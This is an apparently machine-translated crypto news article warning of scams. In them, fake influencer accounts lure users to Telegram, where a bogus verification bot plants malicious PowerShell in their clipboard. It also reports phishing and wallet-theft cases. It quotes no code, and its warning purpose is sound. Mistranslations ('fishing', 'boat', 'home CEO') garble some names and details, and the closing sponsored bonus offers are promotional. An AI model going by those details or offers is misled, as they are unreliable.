A new wave of cryptographic scams has emerged, with attackers using false X accounts to supplant popular influencers and attract unsuspecting users to fraudulent Telegram groups.
Users are then manipulated to install malicious software that compromises the cryptographic portfolio data.
Scammers moving beyond simple fishing scams
According to the SCAM SNIFFER Blog Chain Safety, the fraudsters comment on legitimate publications, attracting users with exclusive information on “alpha” investments and tips. Once people join these Telegram groups, they are immediately asked to undergo a verification process using a boat called officiaisaFeguardbot.
The BOT creates a false sense of urgency and pushes users to quickly complete the verification. However, this seemingly harmless step is a trap: when completing the verification, the Bot injects malicious Powershell code in the user’s clipboard. When running, the code downloads malicious software designed to compromise the system and steal sensitive data, including the information on the cryptographic portfolio.
SCAM Sniffer said that malicious software has been marked by Virustotal as harmful and that previous cases of similar attacks have resulted in theft of private keys, which has led to significant financial losses.
“This represents a new evolution in cryptographic scams: going beyond simple phishing to combine social engineering with malicious software. Be attentive and share it to protect others.”
Rampant scams
Last month, home CEO Nick Neuman shared a chilling story about a fishing scam that directed him. In a publication in X, Neuman described a call he received from a scammer who simulated a Coinbase support agent. The scammer stated that the Neuman password change request had been canceled and encouraged him to click on a suspicious email link.
When Neuman began to interrogate the scammer, they abandoned the act and revealed the true nature of the operation. The scammer boasted that he had recently stolen $ 35,000 to a victim and made it clear that the scam only addressed rich cryptographic investors.
More recently, a cryptographic user with the pseudonym “Leftsideemiri” reported that he lost $ 300,000 due to a social engineering attack. According to the user, the attack began when they received a message containing a link to a conversation from Kakaotalk, which was allegedly for a association meeting. Although the link seemed broken, the user clicked, believing that he was harmless.
In retrospect, they suspect that clicking on the link caused the installation of malicious software, which pledged his wallets Ethereum and Solana, along with other portfolios. The user made it clear that he had not approved or signed any transaction, indicating that the attack was covert and took advantage of social engineering techniques to steal funds.
Special Offer (sponsored) Binance Free 600 $ (exclusive of Cryptopota): Use this link to register a new account and receive an exclusive welcome offer of $ 600 in Binance (full details).
Offer Limited for Cryptopotao readers in Bybit: Use this link to register and open a free $ 500 position with any coin!